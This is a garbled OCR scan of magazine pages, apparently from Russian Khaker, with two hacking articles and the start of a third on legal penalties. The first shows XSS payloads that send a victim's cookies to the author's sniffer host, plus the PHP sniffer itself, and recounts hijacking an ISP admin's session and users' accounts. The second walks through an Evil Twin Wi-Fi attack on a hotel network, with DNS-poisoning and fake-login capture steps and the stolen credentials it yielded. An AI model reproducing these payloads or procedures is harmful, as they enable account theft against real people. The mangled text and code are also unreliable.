Я думаю, ты понял, о чем идет речь. Поля «имя» и «етаіі» 
не фильтровались — и мой код прекрасно выполнялся в 
браузере. Проблема заключалась в том, что все значения 
передавались методом роз!, следовательно, подсунуть 
юзеру «ядовитый» линк не представлялось возможным. 
При попытке передать значение внешним запросом скрипт 
ругнулся, выдав информацию: 

А Гаіаі еггог Гіаз оссигесі: 

Невозможно загрузить определение ТигЬа_Огіѵег_. 

[Ііпе 44 о! /зі!ез/і т р . го I . г и/Н о гсі е/!и г Ьа/І і Ь/О г і ѵе г . р Н р] 

Мне стало интересно, что это за скрипт Эгіѵег.рИр, находя- 
щийся к тому же в веб-директории. Но все мои попытки по- 
лучить доступ к каталогу или скрипту из веба не увенчались 
успехом. Не хватало прав. Я задумался. Картина вырисо- 
вывалась следующая: есть куки с открытым пассом внутри, 
есть ХЗЗ, но нет возможности сформировать линк для жер- 
твы. Соответственно, проведение атаки становилось невоз- 
можным. Такой расклад меня явно не устраивал. 

В запасе у меня оставался один непроверенный поддомен 
рИо!о.гоІ.ш . Там располагался фотоальбом, куда каждый 
юзер мог закачать свои фотографии. Мои глаза медленно 
опустились вниз страницы, к строке «Роѵѵегеб Ьу РИо!оРоз! 
4.7і». Как выяснилось, РИо!оРоз! является платным движ- 
ком, цена версии Рго — $120. Но все же мне удалось найти 



на него багтрак. Увы, в моем случае версия оказалась пат- 
ченной. Выход был один - искатьраги самому. Сперва мне 
захотелось поставить движок себе на локалхост и как сле- 
дует разобраться в нем. Я зашел на официальный сайт фо- 
тоальбома и скардил себе Рго-версию. К сожалению, анти- 
фрод шопа просил подождать 1 бизнес-день для проверки 
вбитой мной информации. Так как ждать мне не хотелось, 
я вернулся на рЬо!о.го!.ги . Первым делом требовалось ак- 
тивировать свой аккаунт, после чего предлагалось приду- 
мать псевдоним автора, пароль оставался тотже, что и при 
поЛлючении к сети. Это несколько обрадовало меня, но, 
посмотрев куки, я обнаружил, что пасс шифровался тсІ5. 
Я залогинился и вошел внутрь. Здесь находилось меню 
для Іакачки фотографий, галерея, профиль, мастер аль- 
бомов, помощь, поиск, а также кнопка «Выход», которой я 
не тіропился воспользоваться. Я понимал, что пробовать 
закачивать файлы с левыми расширениями бесполезно, 
поэтому перешел сразу к профилю пользователя. Пере- 
до мной появилась страница с моими данными, я выбрал 
редактирование профиля и стал проверять поля на отсутс- 
твие фильтрации. Надо сказать, что я часто нахожу уязви- 
мости, в том числе ХЗЗ, на достаточно крупных ресурсах, 
но а тот момент, когда в окне моего браузера появилось 
окошко аіег!, я запомнил надолго. Мало того, что скрипт 
не фильтровал полученные данные из поля «Обо мне», 
так еще и выглядело все очень аккуратно — поле просто 
оставалось пустым. Таким образом, мне достаточно было 
указать в профиле в поле «Обо мне» вот такой скрипт: 
<зсгірі>ореп(Тіір://5іоріІпеТаисІ.огд/іп1.рІпр?’+сІоситепі.соокіе)</ 
зсгір!> Г де іпТ.рІпр — мой снифер. Его код приведен ниже: 

ШІі 

I 

$сІаіе= сІа!е('сІ.т.у : Н:і:з'); 

$ф = Ьреп("./зІд.М", "а"); 

!ри!з($!р,"Оа!е апсі Тііте: ЗсІаІеѴі ІР: $РЕМОТЕ_АООР\п Реіег: $НТТР_ 
РЕРЕРѴі Соокіе: $ОЕІЕВѴ_ЗТРІМ(3\п Адепі: $НТТР_113ЕР_АОЕ1\17\п Нозі: 
$НТТР_НОЗТ Зегѵег: $ЗЕРѴЕР_РОРТ Зсгірі: $ЗСРІРТ_І\ІАМЕ\п МеіЬосІ: 
$ВЕОІІЕЗТ_МЕТНСЮ\п "); 

!сІозе($ф); 

I 

■ 

<зсгірІ> ѵѵі псіоѵѵ. I оса!іоп . Еі ге!= 1 Нйр ://рЕіо!о . гоі . ги/' </зсгі рІ> 

Все полученные данные снифер бережно сохраняет в лог 
(зід.іх!), после чего происходит редирект на фотоальбом 
( рИо!о.гоІ.ги ). В принципе, у меня все было готово для ата- 
ки, оставалось лишь выбрать жертву и впихнуть ей линк. 
Но что-то заставило меня исследовать альбом дальше. И, 
как оказалось, не зря. На нескольких секьюрити-лентах я 
прочитал заметки о наличии хзз в РИо!оРозі, но все приво- 
дившиеся примеры не работали в моем случае. Тогда я ре- 
шил самостоятельно протестировать указанные в багтра- 
ках скрипты. Особенно мое внимание привлек скрипт 
зИоѵѵтетЬегз.рНр. Подставив всем известную строчку 
<5сгірі>аіегі(‘Х53’)</5сгірі> в значение параметрареграде, я не 






> Многие считают, что 
ХЗЗ — фактически 
бесполезная уязви- 
мость. В своей статье 
я доказал, что это 
далеко не так. Часто 
возникают ситуации, 
когда кажется, что 
скрипт фильтрует 
входящие данные. 
Поэтому всегда 
просматривай НітІ- 
код страницы — и 
тогда ты сможешь 
составить рабочий 
сплоит под конкрет- 
ную ХЗЗ-багу. 




>НаЭѴЭ-диске ты 
найдешь видео, 
наглядно показываю- 
щее взлом РОЕ. 



>Внимание! Все 
действия взломщика 
противозаконны! 
Информация предо- 
ставлена исклю- 
чительно с целью 
ознакомления! Ни 
автор, ни редакция за 
твои действия ответс- 
твенности не несут! 
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>Х38 нарНоіо.гоІ.ги 



> Меню для работы с БД 



не удивило меня. Просмотрев ИітІ-код страни- 
цы, янашел подставленные данные: <орііопзеІе 
сІесІ="зеІес1:есІ"><5сгір1:>аІег1:( І х5з')</5сгір1:></ор1:іоп> 
Для успешного выполнения кода было необ-і 
к ходимо закрыть тэг <ор!іоп>, что я и сделал.! 
ІТепеф мой запрос принял вид: ГіПр://рГюіо.гоІ. 
ги/зЬоѵѵтетЬегз.рГір?са1:=1&зі=&раде=7&зог1:=7&ре 
граде=</орІіоп><зсгірЬ>аІегІ(Х53’)</зсгірІ> Все от-іі 
лично работало. Но мне хотелось большего. Я 
■проверил ещедвапараметраскрипта: рризегиі 
раззѵѵогсі — оба оказались уязвимыми, сплоит 
для них был общим. Изменив значение рризег, 
я вновь просмотрел ПітІ-код: <іприиуре="ЫсIсIеп , 



пате="рризег" ѵаІие="<зсгір1:>аІег1:( І хзз')</зсгір1:>" /> 



Требовалось закрыть кавычкой значение ѵаіие 
и добавить />. А в общем виде сплоит выглядел 
так: “/><зсгірі>уоиг_собе</5сгірі>. Просмотрев 
еще несколько скриптов и не заметив ничего 
интересного, я вернулся к зИоѵѵтетЬегз.рПр. 
Следует отметить, что данный скрипт был для 
меня просто «на вес золота». Проверив филь- 
трацию параметра зі, я вновь в этом убедился. 
На этот раз НітІ-код содержал следующее: 



лось пустым, что не вызывало подозрений. А 
во-вторых, я собирался дать админу линк на 
прЬфиль пользователя. Грамотно составить 
текст письма с вложенной ссылкой негвызва- 
ло особых затруднений. Я вставил в уязвимое 
поле код: <зсгірі>ореп(Шр://зІоріИекаиЦ.огд/іпІ. 
рГір?’+сІоситепі.соокіе)</зсгірі> Затем залил на 
сервер снифер. После чего отправил письмо 
админу с ником АпсІу@. У меня не было полной 
уверенности в том, что админ прочитает пись- 
мо и зайдет по указанному линку, поэтому я 
пЬлагался лишь на удачу. И, как ни странно, 
мне повезло! 

Буквально через 40 минут я обнаружил на сер- 
вере файл логазІд.Мсадминскими куками: 

'ИВДаД е: 22.€6Л6:1,6:303| 

|: ЗІІ ЯІ 

Соокіе:рріб=3;%20ррразз=7с022а2354536сІ68Яа57с2041 
есІае42;%20сІе1 : реграде=1 2 

Адепі: МогіІІа/5.0 (XII; II; Ыпих І686; еп-ІІЗ; гѵ:1. 8.0.3) 
Ѳе^кр/20060426 — .5.0.1 



сісіхіприі іуре="іехі" пате="зі" ѵаІие="<зсгірі>аІегі('х 
зз')</зсгірі>" зіуі е = "ѵ/ѵі сіііп : 77 рх" > <ДсІ > Без труда со- 
ставив сплоит: “<ДсІ><зсгір!>уоиг_сосІе</зсгірІ>|, я 
проверил, что все работает на ура. 

Т аким образом, у меня на руках было 5 рабочих 
Х83 на рИоІо.гоІ.ги и одна проблемная на ппаіі. 
гоі.ги . Весьма неплохой набор. Оставалось 
лишь выбрать жертву и впарить ей линк. 

О Выбор жертвы и первый урожай 

Мне предстояло выбрать жертву. Конечно, в 
идеале хотелось получить админские куки. Я 
насчитал 5 админов в фотоальбоме, но ни у 
одного в профиле не было указано ни аси, ни 
мыла. Тогда мой взгляд привлекла домашняя 
страничка админа с ником АпсІу@. Зайдя по 
указанной в профиле ссылке, я попал на сайт 
какой-то домашней сети. По-видимому, это 
был сайт админа, но что самое главное — на 
нем был указан его етаіі. Так как в наличии у 
меня имелось целых 5 ХЗЗ, необходимо было 
определиться с используемой багой. Я решил 
работать с хзз в профиле юзера. Во-первых, 



Заменив в куках свои значения на админс- 
кие, я моментально набрал в адресной строке 
рИоІо.гоІ.ги . Все стало ясно по первой строч- 
ке приветствия фотоальбома: «Добро пожа- 
ловать, АпсІу@!». Получилось! Моей радости 
не было предела. Я сразу полез в админку. К 
счастью, там не требовалось ввода пароля. 
Окинув взглядом меню админки, я заметил оп- 
цию для работы с БД. Но внезапно вспомнил, 
что профиль моего пользователя, на который 
я давал ссылку админу, находится с внедрен- 
ным іаѵазсгірі-кодом, что может вызвать по- 
дозрение у админа при последующих заходах 
по линку. Я быстро поменял значения куков 
назад и залогинился под своим юзером. От- 
редактировав профиль и удалив код из поля 
«Обо мне», я вышел. Мне очень хотелось сде- 
лать дамп базы альбома. Но не тут-то было. 
Зайти обратно под админскими куками не по- 
лучалось! Видимо, админ просек, в чем дело, 
и успел сменить пароль. Это событие сильно 
огорчило меня. Подумать только, я ведь мог 
сделать дамп базы и, возможно, залить веб- 



шелл, но не успел ни первого, ни второго. 
Получить админские данные еще раз было 
нереально. Но на всякий случай отправил 
админу похожее письмо. Я понимал, что шанс 
того, что АпсІу@ снова кликнет на линк, нич- 
тожно мал, поэтому у меня появилась новая 
идея. Раз в админку мне уже не попасть, то по- 
чему бы не поднять несколько пользователь- 
ский акков? Тем более что у многих юзеров в 
профиле был указан етаіі вида юзер@гоІ.ги . 
который являлся по совместительству логи- 
ном к почтовому сервису и личному кабинету, 
а хэш пароля я мог получить при помощи хзз. 
Я отобрал для эксперимента двух пользова- 
телей. Первый — с мылом вида юзер@гоІ.ш, 
а второй — со статусом «Ргіѵііеде ІІзег». От- 
правив письма обоим, я стал ждать. Через час 
на сервере появился файл лога, из которого 
я успешно почерпнул куки обоих юзеров. Хэш 
пароля первого пользователя немедленно 
отправился на брут, а вот второй юзер, с ни- 
ком Ротап Вагаіеѵзку, меня заинтересовал 
своим необычным статусом. Кроме того, этот 
пользователь занимал второе место вслед за 
админом в рейтинге активнейших авторов. К 
моему разочарованию, никакими дополни- 
тельными полномочиями Ротап Вагаіеѵзку 
не обладал, но вот большая часть его гале- 
реи являлась закрытой. Я быстро просмотрел 
все установленные юзером пароли — и мог 
теперь пользоваться его галереей из-под лю- 
бого аккаунта:). 

□ Подводим итоги 

В голове крутился один вопрос: «Каковы ито- 
ги взлома?». Уже через несколько секунд я 
сам ответил себе на него. Несмотря на то, что 
я не успел сдампить базу, итоги были вполне 
удовлетворительными. У меня существовала 
возможность получить доступ практически к 
любому из нескольких тысяч аккаунтов Рола, 
включая доступ к почтовому сервису и личному 
кабинету. А ведь такая возможность могла су- 
ществовать не у меня одного. Я думаю, не стоит 
и говорить, к чему могли привести ошибки про- 
граммистов и администраторов Рола — одного 
из крупнейших провайдеров России, з: 
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Попробуйте подписаться в редакции, позвоните нам. 



(это удобнее, чем принято думать 



) 




5УЫС Лучшие Хакер Хакер Спец Железо Страна Игр РС Игры Мобильные 



Цифровые Камеры компьютеры 




Махі Типіпд Тоіаі 0\Ю 0\Ю Эксперт Тоіаі РооІЬаІІ ОпЬоагсІ Моипіаіп Віке Хулиган Свой бизнес 

Асііоп 



★ Для подписчиков в Москве курьерская 
доставка БЕСПЛАТНО в день выхода журнала 

★ Дешевле, чем в розницу 

★ Гарантия доставки и замены в случае потери 

★ Специальные предложения для подписчиков 

★ Первый номер подписки высылается по звонку 
вместе с заполненной квитанцией для оплаты 



8 - 495 - 780 - 88-29 (для Москвы) 
8 - 800 - 200 - 3-999 (для России) 

ВСЕ ЗВОНКИ БЕСПЛАТНЫЕ 

Мы работаем с 9 до 18 по рабочим дням 









ПАВЕЛ П. АКА ІІКВ-ХЫР 
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ДЛЯ ПОЛУЧЕНИЯ НЕСАНКЦИОНИРОВАННОГО ДОСТУПА В КОРПОРАТИВНЫЕ ѴѴІ-ЕІ СЕТИ ПРИХОДИТСЯ ПРИ- 
МЕНЯТЬ ВСЕ НОВЫЕ СПОСОБЫ АТАК. К ПРИМЕРУ, БОЛЬШИНСТВО ГОСТИНИЧНЫХ СЕТЕЙ ИСПОЛЬЗУЮТ ЗА- 
ШИФРОВАННУЮ ПЕРЕДАЧУ УЧЕТНЫХ ЗАПИСЕЙ, ЧТО СВОДИТ ПЕРЕХВАТ АККАУНТА НА НЕТ. НО, КАЗАЛОСЬ БЫ, 
ДАЖЕ САМУЮ БЕЗВЫХОДНУЮ СИТУАЦИЮ НАМ ПОМОЖЕТ РАЗРЕШИТЬ НОВЫЙ МЕТОД АТАКИ ЕѴІЬШІЫ. ОБ 
ОСОБЕННОСТЯХ ДАННОГО НАПАДЕНИЯ МЫ СЕЙЧАС И ПОГОВОРИМ. 



ХАКЕР оЛ 





0 Из истории... 

26 апреля, 2005: 

«Участники конференции о беспроводных сетях, проходившей на ми- 
нувшей неделе в Лондоне, подверглись массивной вирусной атаке, 

— сообщает Ѵігизіізі.ги. — Неизвестные злоумышленники проникли в 
помещение, в котором проходила конференция, и открыли ее участ- 
никам доступ к сайту, внешне похожему на ресурс для регистрации в 
ѴѴі-Рі сети. После регистрации на сайте участники конференции полу- 
чили на свои компьютеры 45 разных вредоносных программ». 

1 6 мая, 2005: 

Компания АігЭеІепс предупредила мировую общественность о появ- 
лении еще одного способа мошеннических операций против пользо- 
вателей сервисов беспроводного доступа. По словам пресс-службы 
АіЮеІепсе, суть обнаруженного экспертами компании метода состо- 
ит в том, что жертве подсовывают фальшивый интерфейс входа в об- 
щественную беспроводную сеть. 

1 августа, 2005: 

Специалист по вопросам безопасности компьютерных сетей Адам 
Лори, выступая в субботу на конференции Эеісоп в Лас-Вегасе, опи- 
сал удручающее состояние в системах защиты современных гости- 
ничных телевизионных сетей. «Система защиты в гостиничных сетях, 

— резюмировал Лори, — отсутствует как таковая, что открывает про- 
стор для злоумышленников». 

Это лишь некоторые примеры того, как тип атаки Лодие АР (ЕѵіІТѵѵіп) 
все больше вторгается не только в нашу работу, но и в нашу жизнь. 
Для тех, кто по каким-либо причинам еще не сталкивался с представ- 
ленной терминологией, придется пояснить: 

ЕѵіІЪ.ѵіп — «дьявольский близнец»; 

Родив АРСАссгегг РоіпО — не поддающаяся контролю, неконтроли- 
руемая точка доступа. 

Дватермина, по своей сути, идентичны и уже в расшифровке термино- 
логии описывают вид атак в беспроводных сетях ѴѴі-Рі, основанный на 
внедрении в радиопространство существующей беспроводной сети, 
поддельных точек входа в сеть, но таким образом, чтобы для поль- 
зователя беспроводной сети данный факт остался незамеченным, 
«прозрачным». 

Для тестирования-демонстрации данного вида атак была выбрана 
гостиничная сеть Маггіоі-Иоіеі, включающая в себя несколько отелей 
в Москве ргетіит-класса (5 звезд) и предлагающая для своих клиен- 



тов платный ѴѴі-Рі доступ. Стоимость услуги беспроводного доступа и 
минимальное время заказа — 300 рублей за 1 час. 

Все нижеописанное проверялось на отелях: 

- Маггіо* СгапсІ 

- Маггіо* Еоуаі Аигога 

Все исследование-демонстрация проводилось на стареньком уже но- 
утбуке РЗ с ОС М3 ѴѴіпбоѵѵз 2000 Рго ЗР4. Как базис. Функции и средс- 
тва, применяемые в данной статье, прекрасно работают и на более 
«современных» операционных системах от МісгозоІІ. 

□ Исходные данные 

Сканирование радиоэфира на частоте ѴѴі-Рі выявило эту гостиничную 
сеть и подключенных к ней клиентов: 

(53Ю) Туре (ВЗЗЮ) [ 5І\ІВ Зід ІЧоізе ] ЦазЮИаппеІ 

(МозсотІЧЕТ) ВЗЗ ( 00:06:29:1 сЫ7:сісі ) [33 82 49] 0001 11 

(МозсотІЧЕТ) ВЗЗ ( 00:07:85:ЬЗ:55:с1 ) [19 68 49] 0001 06 

Это данные поточкам доступа, установленным в гостиничном комплек- 
се. Итак, что нам необходимо знать при проведении атаки ЕѵіІТѵѵіп? 

1 / МАС-адрес точки доступа; 

2 Рабочая частота точки доступа (канал); 

3/ Наименование (53Ю) атакуемой сети (устройства); 

4 Надо ли вообще проводить атаку ЕѵіІТѵѵіп? Не даст ли нам требуе- 
мой информации перехват сниферами беспроводного трафика? 

5/ «Популярность» данной публичной коммерческой беспроводной 
сети. Что толку сидеть и ждать у моря погоды, если услугой пользует- 
ся директор заведения раз в сутки? Соответственно, эффективность 
атаки очень сильно зависит от числа обращений, подключения к сети, 
новых пользователей или ротация старых. 

6/ Сила сигнала точки доступа. Мы не будем нарушать заданный 
режим работы имеющегося оборудования в компании. «Гасить» ре- 
альные точки доступа не потребуется, хотя зачастую необходимость 
проведения ЭОЗ-атак на объекты инфраструктуры сети стоит очень 
остро. В данном случае мы имеем: 

Имя сети: МозсотІЧЕТ 

МАС-адрес:00:0Ф29:1 сІ:сІ7:сМ — сравнивая первые 3 октета МАС-ад- 
реса в вазе 01)1, становится понятно, что используется оворудова- 
ние компании Сізсо Зуз^егпз. 

Канал: 1 1 . 
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> Как видишь, адаптер отображает только одну сеть - мою :) 



Далѳѳ нас будет интересовать сетевая адресация, применяемая в 
сегменте сети: 

Результат команды ірсопіід /аІІ 

Настройка протокола ІР для ѴѴІпбоѵѵз 2000 

Имя компьютера : изІГіеасІІ 

Основной ОЫЗ-суффикс 

Тип узла : Г ибридный 

Включена ІР-маршрутизация . . . . : Нет 
Доверенный ѴѴІІЧЗ-сервер : Нет 

Адаптер ІІЗТ_ѴѴІРІ_сІгѵг: 



ОЫЗ суффикс этого подключения 



Описание : УЗТ ѴѴІРі бгѵг Сотрх 


Физический адрес 


. . : 00-80-48-2В-84-34 


йНСР разрешен 


■ :Да 


Автонастройка включена 


: Да 


ІР-адрес : 10.43.1.155 


Маска подсети 


: 255.255.0.0 


Основной шлюз 


. : 10.43.1.1 


БНСР-сервер 


: 10.43.1.1 


0145-серверы 


: 212.130.104.10 


195.68.135.5 


Основной ѴѴІІЧЗ-сервер .. 


. . . . : 10.43.1.1 



Собственно говоря, комментарии излишни. При попытке инициа- 
лизации какой-либо ИДр-сессии (обращении на какой-либо сайт) 
мы видим форму аутентификации в системе, оповещающую нас о 
поставщике услуг беспроводной связи и двухфакторной аутенти- 
фикации в виде логина и пароля, каждый из которых состоит из 4-х 
цифровых символов. Аутентификация проходит с применением бе- 
зопасного доступа НТТР Зесигеб с применением 53І_. Что, в свою 
очередь, практически сводит на нет перехват реквизитов доступа с 
помощью многочисленных беспроводных сниферов, к примеру, тем 
же самым КізтеГом. 

В итоге наша задача состоит из следующих этапов: 

1, Поднятие своей точки доступа: 

• обеспечение подключения клиентов к своей точке доступа в режиме 
Іпігазігисіиге; 

• предоставление нашей точкой доступа ОІМЗ-, ОНСР-сервисов. 

2/ Создание ложного веб-сервиса, эмулирующего работу реальной 
аутентификационной панели. 

Конечная задача — доступ к выданным пользователям реквизитам до- 



ступа, аккаунтам на пользование услугами связи. 

Исходное аппаратное и программное обеспечение: 

Ноутбук, уже упоминавшийся выше; 

2 Для реализации точки доступа на ноутбуке и превращения его в 
роутер есть три пути: 

а) У тебя уже есть адаптер на чипсете адеге/Иегтез, штатными средс- 
твами которого ты можешь перевести режим работы не только в аб- 
Нос (точка-точки) или іпігазігисіиге (многоточие-точка), но и в режим 
асі аз базе зіаііоп, то есть эмуляции точки доступа. 

Е. Использование программного средства ЗоІіАР ( ИДр://ѵѵѵѵѵѵ.рс1еІ. 
сот/зоіІар.рНр У но при условии, что имеющийся у тебя клиентский 
ѴѴі-Рі адаптер поддерживается данным продуктом. Эта софтина 
платная. 

в) ЗоІІАР стоит порядка $30. За эту же сум- 
му предпочтительнее обзавестить адапте- 
ром. Использовавшихся в данном случае 
Сотрех ѴѴІ_11В, примечательной особен- 
ностью которого является не только чипсет 
Адеге Негтез, но и наличие МС-МХ разъема 
для подключения внешней антенны или уси- 
лителя. А цена его в московских магазинах 
— чуть меньше стоимости ЗоІіАР. 

3 В качестве 0143-сервера рекомендую ис- 
пользовать ТгееѴѴаІк ( НДрУ/пІсаписк.сот ). 

Преимущества: бесплатен, поддержка Ьіпб, 
простая конфигурация и использование. 

4 / В качестве ОНСР-сервера рекомендую 
использовать ЫизуОНСР ( НДрУ/зоигсеіогае. 
пеІ/ргоіесІз/ІоозѵбИсрЛ . Преимущества ана- 
логичны ТгееѴѴаІк. 

5 / Веб-сервер АрасИе в пояснениях не нуж- 
дается. Будет использоваться данная сборка: 
арасИе_2.0.58-\д/іп32-х86-по_ззІ.тзі 

6 Интерпретатор РегІ в реализации Асііѵе- 
Зіаіе РегІ в одной из последних сборок: 

АсІіѵеРегІ-5.8.6.81 1-МЗ\А/іп32-х86- 122208. 
тзі 

7 Аігзпаіі Іог ѴѴІпбоѵѵз от исследовательской 
группы ЗНтоо, которые одни из первых по- 
ведали отрасли и бизнесу об атаке ПодиеАР 
( НДрѴ/аігзпагі.зНтоо.сот У 

□ В атаку! 

Для места проведения атаки (установки точки доступа) был выбран 
ресторан в фойе гостиничного комплекса, где уже находились поль- 
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> На ОѴО ты найдешь 
весь софт, необходимый 
для организации собс- 
твенной точки доступа. 






> Все действия 
проводились лишь 
в ознакомительных 
целях. За использо- 
вание материала в 
незаконных целях 
автор и редакция 
ответственности не 
несут. 
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зоватѳли ѴѴі-Рі. Место размещения обусловлено тем, что сила сиг- 
нала моей точки доступа должна превышать силу сигнала реальных 
точек доступа. Это сделано намеренно: ведь клиентские адаптеры 
при выборе сети для соединения, имеющих одинаковые иденти- 
фикаторы (ззіб+тас+сИаппеІ), изберут точку с наиболее высокими 
показателями уровня сигнала. 

Поэтому мой ѴѴі-Рі адаптер был переведен в режим точки доступа, а 
идентификатор сети был выбран МозсотЫЕТ. 

Присоединяясь к сети, мы уже получили представление о применяе- 
мой сетевой адресации, поэтому необходимо было внести в конфи- 
гурационный файл ОНСР-сервера сИісрсІ.сопТ следующие строки: 

зиЬпеі 255.255.0.0 
гоиіег 10.43.1 .1 
сіпз 10.43.1.1 
ѵѵіпз 10.43.1 .1 

В файле сНоср.ірІізІ необходимо указать диапазон выдачи ІР-адре- 
сов: 

10.43.1.150 

10.43.1.154 

Единственное отличие, по сравнению с атакуемым сегментом, — это 
адрес ОІЧЗ-сервера, в качестве которого выступает мой ноутбук. 
Собственно говоря, следующим шагом мы произведем локальный 
ЭЫЗ сасНе роізопіпд. Через управляющую панель ОЫЗ-сервера ос- 
танавливаем сервис. После остановки сервиса потребуется отре- 
дактировать кэш сервера по следующему пути: 

С :\\зу зіе т 3 2\сІ п з\е!с\п ат е б . с ас Ті е 

Редактирование заключается во внесении следующих строк в кон- 
фиг: 

; ІосаІ 

ѵѵѵѵѵѵ. хакер. ш 155000 А 10.43.1.1 

Теперь все присоединенные ко мне клиенты беспроводной сети, за- 
хотев почитать новости на нашем сайте, получат ответ от локального 
веб-сервера, установленного на ноутбуке. 

Веб-сервер мы настроим следующим образом: обязательно сохра- 
ним аутентификационную страницу с приглашением ввода данных 
аккаунта в /Шосз и исправим пути к файлам изображений. Для до- 
стижения цели вместо исходной процедуры вставим скрипт перехва- 



та данных АігзпагІ: 

<РОВМ пате=1огт1 опзиЬті1=ге1ит(СИескРогт()); ас1іоп=/тозсот/ 

рогіаІ.азр?асііоп=ЬІІІІпд&атр;зід=с1Ь0е305есс3825Ьаса2саесІ4Ш449еа 

теІТюсІ=розІ> 

В исходный код заглавной страницы внесем: 
сіогт асііоп="/сді-Ьіп/аігзпагРсді" теІТюсІ="розГ> 
и 

<іприиуре="1ех1" пате="изегпате"> - 
<іпри1 1уре="раззѵѵогсІ" пате="раззѵѵогсІ"><Ьг> 

<іпри1 1уре="зиЬті1" ѵаІие="Сопііпие"> 

После выполнения данных мероприятий остается ждать. На моем 
стареньком ноутбуке батарейки хватает на 3 часа. За два часа, про- 
веденных за распитием кофе в отеле, были скомпрометированы две 
учетные записи пользователей. 

Хочу заметить: смена МАС-адреса своего адаптера на МАС-адрес 
атакуемой сети желательна, но не обязательна. Все равно стан- 
дартные клиент-менеджеры беспроводного адаптера на ноутбуках 
(включая менеджер беспроводной связи от МісгозоІД покажуттолько 
одну сеть... 

Увидев в окне вывода ОНСР-сервера информацию о запросе-выдачи 
ІР-адреса, уже можно с большей вероятностью предположить, что в 
файле таггіоЕМ мы увидим 8 заветных цифр. 

Лог выдачи ІР-адреса ЛНСР-сервером 

ІІМРО: Могеіоп Вау ОНСР Зегѵег (ѵО.8.25-3 ѴѴІІМ) зіагіесі 
ІІМРО: Ызіепіпд Тог ОНСР теззадез оп пеіѵѵогк... 

ІІМРО: оооТі, доізоте! 

ІІМРО: АІагтоІІ 

ІЫРО: гесеіѵесі а ОНСРОІЗСОѴЕР 
ІІМРО: ЗеагсТііпд Іог асісігезз Тог пеѵѵ сІіепТ. . . 

ІІМРО: ТМе уіеісіесі ѵаіісі МАС/ІР раіг - Ір_ас1с1г = 200000а 
ІІМРО: гесеіѵесі а ОНСРВЕОІІЕЗТ 
ІЫРО: ОаОООООІ 
ІІМРО: Зепсііпд АСК 

ІІМРО: ЕпТегіпд сусіе - ІМитЬег оі сиггепі о!1егз = 1 
ІЫРО: сусіе І\Іо - 0 

ІІМРО: сТіасІсІг таІсТіез хл/РіаТ \л/е Тіаѵе іп оиг іпТегпеІ оііег аггау 
ІЫРО: Зепсііпд АСК Тог Ір_ас1с1г 10.43.1.2 
ІІМРО: доі а ѵаіісі МАС/ІР раіг Ітот сІИсрсІ . Іеазез 
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ІІЧРО: Ір_ас1с1г іакеп = 200000а 
ІІЧРО: АІагт Оп 

ІІЧРО: Ызіепіпд Рог ОНСР теззадез оп пеіѵѵогк... 

Вот и первый клиент присоединился к нашей поддельной точке до- 
ступа. Просмотрев позже файл с результатом перехвата, я обнару- 
жил учетные записи: 



щитных механизмов, а клиенты корпоративной сети, подсоединяясь 
к тебе, будут получать беаззосіаііоп Ігатез, приводящие к разрыву 
соединений между тобой и клиентами. 

3/ Воровать чужие пароли нехорошо — тебя будут мучить угрызения 
совести :). пс 



игі = ІосаІИозІ, раззѵѵогсі = 5498, изегпате = 3498 
игі = ІосаИпозі, раззѵѵогсі = 1038, изегпате = 7624 

Целью нашей атаки ставилось получение только реквизитов досту- 
па. Как продолжение данной атаки можно предложить следующий 
путь: придать своей точки доступа функции транспарентной прокси 
и «пропускать» весь трафик через себя. То есть под перехваченным 
аккаунтом доступа самому осуществить подключение через второй 
адаптер на ноутбуке к реальной сети, а для скомпрометированных 
пользователей услуги доступа к интернету выполнять самим. 

Стоит также отметить, что в ѴѴі-Рі сети МагіоН были обнаружены 
уязвимости, допущенные при построении сети, в небезопасной на- 
стройке самих точек доступа. 

Межсетевой экран пропускает в интернет ІСМР-запросы и возвра- 
щает ответы, что позволяетнам организовать простейший ІСМР-тун- 
нель со своим сервером в интернете, используя ресурсы гостинич- 
ной сети. 

С:\>ріпд ѵѵѵѵѵѵ.ги 

Обмен пакетами с ѵѵѵѵѵѵ.ги [194.87.0.50] по 32 байт: 

Ответ от 1 94.87.0.50: число байт=32, время=8мс, ТТІ_=55 

При приблизительном исследовании исходного портала для аутен- 
тификации я быстро нашел Х55 в беіаиіі.азр, что еще раз подчерки- 
вает халатность администраторов. 

0 Резюме 

Продемонстрированный простейший способ атаки применим в боль- 
шинстве коммерческих публичных хотспотов (сетей ѴѴі-Рі доступа). 
Обычно данные компании не затрудняют себя покупкой оборудова- 
ния, которое противодействует атаке ВодиеАР. При атаке на корпо- 
ративную внутреннюю сеть ты можешь столкнуться с тем, что: 

1 / Служба безопасности, используя сканеры беспроводного эфира 
и применяя методы триангуляции, быстро вычислит местонахожде- 
ние твоей точки доступа и настучит дубинкой по почкам; 

2/ Твоя точка доступа будет атакована 005-атакой со стороны за- 
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ПРОВОДЯ ДОЛГОЕ ВРЕМЯ ВО ВСЕМИРНОЙ ПАУТИНЕ, КАЖДЫЙ ИЗ НАС НЕРЕДКО НАРУШАЕТ ЗАКОН. НЕЗАВИСИМО ОТ 
РОДА ЗАНЯТИЙ, БУДЬ ТО БЕЗОБИДНЫЙ ДЕФЕЙС САЙТОВ, КРАЖА ПАРОЛЕЙ НА ДИАЛАП ИЛИ РАСПРОСТРАНЕНИЕ ТРОЯ- 
НОВ, ТЕБЕ КОГДА-НИБУДЬ ПРИДЕТСЯ ОТВЕТИТЬ ЗА СОДЕЯННОЕ. А ЧТОБЫ ТЫ ОСОЗНАВАЛ НЕОТВРАТИМОСТЬ НАКАЗА- 
НИЯ, МЫ РАССКАЖЕМ ТЕБЕ, ЧТО ЗА ЭТО БЫВАЕТ ПО НАШИМ ЗАКОНАМ. 

БОЛЬШИНСТВО СЕТЕВЫХ НАРУШИТЕЛЕЙ СЧИТАЮТ, ЧТО ОТВЕТСТВЕННОСТЬ ЗА КОМПЬЮТЕРНЫЕ ПРЕСТУПЛЕНИЯ ОГРАНИ- 
ЧЕНА Л ИШЬ ТРЕМЯ СТАТЬЯМИ 28 ГЛАВЫ ОТЕЧЕСТВЕННОГО УК (272, 273, 274), НО ЭТО НЕ СОВСЕМ ТАК. СУЩЕСТВУЮТ И ДРУ- 
ГИЕ СТАТЬИ, ПО КОТОРЫМ МОГУТ ПРИВЛЕЧЬ К ОТВЕТСТВЕННОСТИ, И СОВСЕМ НЕ ОБЯЗАТЕЛЬНО, ЧТО ИХ НУЖНО ИСКАТЬ В 
